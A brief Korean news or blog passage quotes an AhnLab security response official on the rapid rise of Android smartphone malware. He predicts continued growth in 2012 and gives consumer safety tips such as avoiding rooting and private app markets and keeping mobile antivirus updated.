안철수연구소 시큐리티대응센터 이호웅 센터장은 "아직 국내에는 구체적 피해가 발생하지 않았지만 스마트폰 악성코드는 안드로이드를 중심으로 폭발적으로 증가하고 있다. 이는 스마트폰의 확산, 공격자의 직접수익 경로 확보 등의 이유로 2012년에도 증가세가 이어질 것으로 예상된다”라며, “사용자는 스마트폰 루팅이나 탈옥, 사설 마켓 이용 등을 자제하고, 애플리케이션을 다운받을 때 평판정보 확인, V3 모바일과 같은 스마트폰 전용 백신의 설치 및 최신 버전 유지 등의 주의를 기울이는 것이 좋다” 고 강조했다.
저작자 표시
신고
Posted by 비회원